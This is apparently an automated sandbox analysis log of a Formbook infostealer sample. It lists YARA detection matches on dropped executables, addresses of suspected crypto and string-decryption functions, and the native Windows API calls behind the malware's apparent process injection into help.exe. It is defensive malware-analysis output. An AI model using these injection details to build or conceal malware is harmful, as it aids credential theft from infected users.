Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1B090 2_2_00C1B090
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD20A8 2_2_00CD20A8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC1002 2_2_00CC1002
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1841F 2_2_00C1841F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1D5E0 2_2_00C1D5E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32581 2_2_00C32581
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD1D55 2_2_00CD1D55
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0F900 2_2_00C0F900
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD2D07 2_2_00CD2D07
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C00D20 2_2_00C00D20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C24120 2_2_00C24120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD2EF7 2_2_00CD2EF7
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD22AE 2_2_00CD22AE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C26E30 2_2_00C26E30
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CCDBD2 2_2_00CCDBD2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD1FF1 2_2_00CD1FF1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3EBB0 2_2_00C3EBB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD2B28 2_2_00CD2B28
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD28EC 9_2_00CD28EC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B090 9_2_00C1B090
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD20A8 9_2_00CD20A8
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1002 9_2_00CC1002
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1841F 9_2_00C1841F
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD25DD 9_2_00CD25DD
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1D5E0 9_2_00C1D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32581 9_2_00C32581
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD1D55 9_2_00CD1D55
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0F900 9_2_00C0F900
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD2D07 9_2_00CD2D07
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C00D20 9_2_00C00D20
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD2EF7 9_2_00CD2EF7
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD22AE 9_2_00CD22AE
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C26E30 9_2_00C26E30
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCDBD2 9_2_00CCDBD2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD1FF1 9_2_00CD1FF1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3EBB0 9_2_00C3EBB0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD2B28 9_2_00CD2B28
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CEA25 9_2_004CEA25
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B9280 9_2_004B9280
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004BDC20 9_2_004BDC20
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B2D90 9_2_004B2D90
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CE78A 9_2_004CE78A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD792 9_2_004CD792
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B2FB0 9_2_004B2FB0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01201030 18_2_01201030
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121EA25 18_2_0121EA25
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01209280 18_2_01209280
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01202D90 18_2_01202D90
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0120DC20 18_2_0120DC20
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01202FB0 18_2_01202FB0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121E78A 18_2_0121E78A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D792 18_2_0121D792
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01274120 18_2_01274120
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0125F900 18_2_0125F900
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012799BF 18_2_012799BF
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01272990 18_2_01272990
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0132E824 18_2_0132E824
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127A830 18_2_0127A830
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01256800 18_2_01256800
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01311002 18_2_01311002
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012820A0 18_2_012820A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013220A8 18_2_013220A8
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0126B090 18_2_0126B090
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013228EC 18_2_013228EC
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01322B28 18_2_01322B28
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131231B 18_2_0131231B
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127A309 18_2_0127A309
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01273360 18_2_01273360
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012FCB4F 18_2_012FCB4F
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127AB40 18_2_0127AB40
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0128EBB0 18_2_0128EBB0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0128138B 18_2_0128138B
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012FEB8A 18_2_012FEB8A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127EB9A 18_2_0127EB9A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012A8BE8 18_2_012A8BE8
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013023E3 18_2_013023E3
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131DBD2 18_2_0131DBD2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013103DA 18_2_013103DA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0128ABD8 18_2_0128ABD8
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127B236 18_2_0127B236
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0130FA2B 18_2_0130FA2B
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013232A9 18_2_013232A9
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013222AE 18_2_013222AE
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01314AEF 18_2_01314AEF
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131E2C5 18_2_0131E2C5
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01250D20 18_2_01250D20
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01322D07 18_2_01322D07
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01321D55 18_2_01321D55
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01272D50 18_2_01272D50
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012865A0 18_2_012865A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01282581 18_2_01282581
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01312D82 18_2_01312D82
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0126D5E0 18_2_0126D5E0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013225DD 18_2_013225DD
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01272430 18_2_01272430
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0126841F 18_2_0126841F
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127B477 18_2_0127B477
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131D466 18_2_0131D466
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01314496 18_2_01314496
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01321FF1 18_2_01321FF1
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013167E2 18_2_013167E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0132DFCE 18_2_0132DFCE
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01276E30 18_2_01276E30
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131D616 18_2_0131D616
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01275600 18_2_01275600
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012DAE60 18_2_012DAE60
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01301EB6 18_2_01301EB6
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01322EF7 18_2_01322EF7
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: String function: 00C0B150 appears 35 times
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: String function: 0125B150 appears 154 times
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: String function: 012AD08C appears 42 times
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: String function: 012E5720 appears 78 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 00C0B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C498F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_00C498F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49840 NtDelayExecution,LdrInitializeThunk, 2_2_00C49840
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_00C49860
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C495D0 NtClose,LdrInitializeThunk, 2_2_00C495D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C499A0 NtCreateSection,LdrInitializeThunk, 2_2_00C499A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49540 NtReadFile,LdrInitializeThunk, 2_2_00C49540
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_00C49910
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C496E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_00C496E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A50 NtCreateFile,LdrInitializeThunk, 2_2_00C49A50
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_00C49660
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00C49A00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A20 NtResumeThread,LdrInitializeThunk, 2_2_00C49A20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49FE0 NtCreateMutant,LdrInitializeThunk, 2_2_00C49FE0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49780 NtMapViewOfSection,LdrInitializeThunk, 2_2_00C49780
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C497A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_00C497A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49710 NtQueryInformationToken,LdrInitializeThunk, 2_2_00C49710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C498A0 NtWriteVirtualMemory, 2_2_00C498A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4B040 NtSuspendThread, 2_2_00C4B040
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49820 NtEnumerateKey, 2_2_00C49820
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C499D0 NtCreateProcessEx, 2_2_00C499D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C495F0 NtQueryInformationFile, 2_2_00C495F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49950 NtQueueApcThread, 2_2_00C49950
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49560 NtWriteFile, 2_2_00C49560
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49520 NtWaitForSingleObject, 2_2_00C49520
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4AD30 NtSetContextThread, 2_2_00C4AD30
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C496D0 NtCreateKey, 2_2_00C496D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A80 NtOpenDirectoryObject, 2_2_00C49A80
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49650 NtQueryValueKey, 2_2_00C49650
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49670 NtQueryInformationProcess, 2_2_00C49670
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49610 NtEnumerateValueKey, 2_2_00C49610
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A10 NtQuerySection, 2_2_00C49A10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4A3B0 NtGetContextThread, 2_2_00C4A3B0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49760 NtOpenProcess, 2_2_00C49760
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49770 NtSetInformationFile, 2_2_00C49770
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4A770 NtOpenThread, 2_2_00C4A770
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49B00 NtSetValueKey, 2_2_00C49B00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4A710 NtOpenProcessToken, 2_2_00C4A710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49730 NtQueryVirtualMemory, 2_2_00C49730
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49840 NtDelayExecution,LdrInitializeThunk, 9_2_00C49840
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_00C49860
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C495D0 NtClose,LdrInitializeThunk, 9_2_00C495D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C499A0 NtCreateSection,LdrInitializeThunk, 9_2_00C499A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49540 NtReadFile,LdrInitializeThunk, 9_2_00C49540
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_00C49910
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C496D0 NtCreateKey,LdrInitializeThunk, 9_2_00C496D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C496E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_00C496E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49650 NtQueryValueKey,LdrInitializeThunk, 9_2_00C49650
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A50 NtCreateFile,LdrInitializeThunk, 9_2_00C49A50
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_00C49660
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49610 NtEnumerateValueKey,LdrInitializeThunk, 9_2_00C49610
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49FE0 NtCreateMutant,LdrInitializeThunk, 9_2_00C49FE0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49780 NtMapViewOfSection,LdrInitializeThunk, 9_2_00C49780
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49B00 NtSetValueKey,LdrInitializeThunk, 9_2_00C49B00
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49710 NtQueryInformationToken,LdrInitializeThunk, 9_2_00C49710
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C498F0 NtReadVirtualMemory, 9_2_00C498F0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C498A0 NtWriteVirtualMemory, 9_2_00C498A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4B040 NtSuspendThread, 9_2_00C4B040
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49820 NtEnumerateKey, 9_2_00C49820
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C499D0 NtCreateProcessEx, 9_2_00C499D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C495F0 NtQueryInformationFile, 9_2_00C495F0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49950 NtQueueApcThread, 9_2_00C49950
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49560 NtWriteFile, 9_2_00C49560
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49520 NtWaitForSingleObject, 9_2_00C49520
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4AD30 NtSetContextThread, 9_2_00C4AD30
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A80 NtOpenDirectoryObject, 9_2_00C49A80
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49670 NtQueryInformationProcess, 9_2_00C49670
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A00 NtProtectVirtualMemory, 9_2_00C49A00
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A10 NtQuerySection, 9_2_00C49A10
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A20 NtResumeThread, 9_2_00C49A20
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C497A0 NtUnmapViewOfSection, 9_2_00C497A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4A3B0 NtGetContextThread, 9_2_00C4A3B0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49760 NtOpenProcess, 9_2_00C49760
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49770 NtSetInformationFile, 9_2_00C49770
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4A770 NtOpenThread, 9_2_00C4A770
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4A710 NtOpenProcessToken, 9_2_00C4A710
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49730 NtQueryVirtualMemory, 9_2_00C49730
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA320 NtCreateFile, 9_2_004CA320
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA3D0 NtReadFile, 9_2_004CA3D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA450 NtClose, 9_2_004CA450
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA500 NtAllocateVirtualMemory, 9_2_004CA500
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA31A NtCreateFile, 9_2_004CA31A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA3CA NtReadFile, 9_2_004CA3CA
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA4FA NtAllocateVirtualMemory, 9_2_004CA4FA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A320 NtCreateFile, 18_2_0121A320
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A3D0 NtReadFile, 18_2_0121A3D0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A500 NtAllocateVirtualMemory, 18_2_0121A500
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A450 NtClose, 18_2_0121A450
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A31A NtCreateFile, 18_2_0121A31A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A3CA NtReadFile, 18_2_0121A3CA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A4FA NtAllocateVirtualMemory, 18_2_0121A4FA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_01299910
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_01299860
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012995D0 NtClose,LdrInitializeThunk, 18_2_012995D0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299FE0 NtCreateMutant,LdrInitializeThunk, 18_2_01299FE0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_01299660
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012996E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_012996E0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299950 NtQueueApcThread, 18_2_01299950
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012999A0 NtCreateSection, 18_2_012999A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012999D0 NtCreateProcessEx, 18_2_012999D0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299820 NtEnumerateKey, 18_2_01299820
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299840 NtDelayExecution, 18_2_01299840
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129B040 NtSuspendThread, 18_2_0129B040
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012998A0 NtWriteVirtualMemory, 18_2_012998A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012998F0 NtReadVirtualMemory, 18_2_012998F0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299B00 NtSetValueKey, 18_2_01299B00
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129A3B0 NtGetContextThread, 18_2_0129A3B0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A20 NtResumeThread, 18_2_01299A20
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A00 NtProtectVirtualMemory, 18_2_01299A00
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A10 NtQuerySection, 18_2_01299A10
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A50 NtCreateFile, 18_2_01299A50
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A80 NtOpenDirectoryObject, 18_2_01299A80
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299520 NtWaitForSingleObject, 18_2_01299520
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129AD30 NtSetContextThread, 18_2_0129AD30
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299560 NtWriteFile, 18_2_01299560
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299540 NtReadFile, 18_2_01299540
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012995F0 NtQueryInformationFile, 18_2_012995F0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299730 NtQueryVirtualMemory, 18_2_01299730
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299710 NtQueryInformationToken, 18_2_01299710
